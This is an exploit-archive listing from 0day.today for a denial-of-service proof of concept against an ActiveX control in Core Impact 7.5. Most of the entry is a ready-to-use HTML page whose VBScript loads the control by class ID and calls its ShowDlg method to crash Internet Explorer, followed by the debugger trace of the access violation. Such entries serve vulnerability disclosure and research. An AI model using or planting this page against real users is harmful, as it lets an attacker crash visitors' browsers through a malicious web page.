Core Impact 7.5 Denial of Service Vulnerability

2010-02-11T00:00:00
ID 1337DAY-ID-10850
Type zdt
Reporter Beenu Arora
Modified 2010-02-11T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ===============================================
Core Impact 7.5 Denial of Service Vulnerability
===============================================

#RegKey Safe for Script: False
#RegKey Safe for Init: False
 
#Implements IObjectSafety: True
 
<html>
Test DoS Page
<object classid='clsid:CDF8A044-74AF-4045-AE13-D8AEDF802538' id='target' ></object>
<script language='vbscript'>
arg1=String(1, "A")
target.ShowDlg arg1
</script>
 
 
Access violation exception (0xC0000005) when trying to read from memory location 0x00000020 in the thread below.
 
Function                        Arg 1     Arg 2     Arg 3   Source
TargetControl+145d0                 0000000f     00000000     00000000   
mfc80u!CWnd::WindowProc+22          0000000f     00000000     00000000   
mfc80u!AfxCallWndProc+a3                00000000     003008d0     0000000f   
mfc80u!AfxWndProc+35                003008d0     0000000f     00000000   
TargetControl!DllGetClassObject+c1a2        003008d0     0000000f     00000000   
user32!InternalCallWinProc+28           05987d5f     003008d0     0000000f   
user32!UserCallWinProcCheckWow+150          03c6a110     05987d5f     003008d0   
user32!DispatchClientMessage+a3             0068d978     0000000f     00000000   
user32!__fnDWORD+24     0013debc            00000018     0068d978   
ntdll!KiUserCallbackDispatcher+13           7e42aedc     003e08f6     0000005e   
user32!NtUserCallHwndLock+c             003e08f6     0694e16c     0013df74   
mfc80u!CWnd::RunModalLoop+77            00000004     4aba760d     00000000   
mfc80u!CDialog::DoModal+129             4ab791a2     05540874     00000000   
TargetControl+ef9f     0694db40         0000001c     00000004   
oleaut32!CTypeInfo2::Invoke+234             03c7491c     0694db40     00000000   
TargetControl+11c58     0694db40            00000001     00000409   
mshtml!COleSite::ContextInvokeEx+149        0414b6f0     00000001     00000409   
mshtml!COleSite::ContextThunk_InvokeEx+44       0414b6f0     00000001     00000409   
vbscript!IDispatchExInvokeEx2+a9            0003b8d8     0414ce50     00000001   
vbscript!IDispatchExInvokeEx+56             0003b8d8     0414ce50     00000001   
vbscript!InvokeDispatch+101             0003b8d8     0003b990     00000001   
vbscript!InvokeByName+42                0003b8d8     0414ce50     00000001   
vbscript!CScriptRuntime::RunNoEH+234c       0013e6a4     4aab5064     00000000   
vbscript!CScriptRuntime::Run+62             0013e6a4     0003fd08     0003b8d8   
vbscript!CScriptEntryPoint::Call+51         0013e6a4     00000000     00000000   
vbscript!CSession::Execute+c8           0003fd08     0013e888     00000000   
vbscript!COleScript::ExecutePendingScripts+144  0013e888     0013e868     0003e454   
vbscript!COleScript::ParseScriptTextCore+243    0414cd54     0414a394     00000000   
vbscript!COleScript::ParseScriptText+2b         0003e454     0414cd54     0414a394   
mshtml!CScriptCollection::ParseScriptText+1da   0414ca90     73301e34     00000000   
mshtml!CScriptElement::CommitCode+1e1       00000000     00000000     00000000   
mshtml!CScriptElement::Execute+a4           0414a520     06194d97     00000000   
mshtml!CHtmParse::Execute+41            0414a5e0     0414a520     7dcc4b65   
mshtml!CHtmPost::Broadcast+d            7dcc4b83     06194d97     0414a520   
mshtml!CHtmPost::Exec+32b               06194d97     0414a520     04140810   
mshtml!CHtmPost::Run+12                 06194d97     04140810     06194ccf   
mshtml!PostManExecute+51                04140810     06194d97     0414a520   
mshtml!PostManOnTimer+76                00250938     00000113     00001003   
user32!InternalCallWinProc+28           7dcfb9d8     00250938     00000113   
user32!UserCallWinProc+f3               00000000     7dcfb9d8     00250938   
user32!DispatchMessageWorker+10e            0013eb90     00000000     0013eb78   
user32!DispatchMessageW+f               0013eb90     00000000     00163468   
browseui!TimedDispatchMessage+33            0013eb90     0013ee98     00000000   
browseui!BrowserThreadProc+336          00162ca8     0013ee98     00162ca8   
browseui!BrowserProtectedThreadProc+50      00162ca8     00162ca8     00000000   
browseui!SHOpenFolderWindow+22c             00162ca8     00000000     00000000   
shdocvw!IEWinMain+133               001523ba     00000001     0140d0b8   
iexplore!WinMainT+2de               00400000     00000000     001523ba   
iexplore!_ModuleEntry+99                0140d0b8     00000018     7ffdf000   
kernel32!BaseProcessStart+23            00402451     00000000     78746341    



#  0day.today [2018-04-14]  #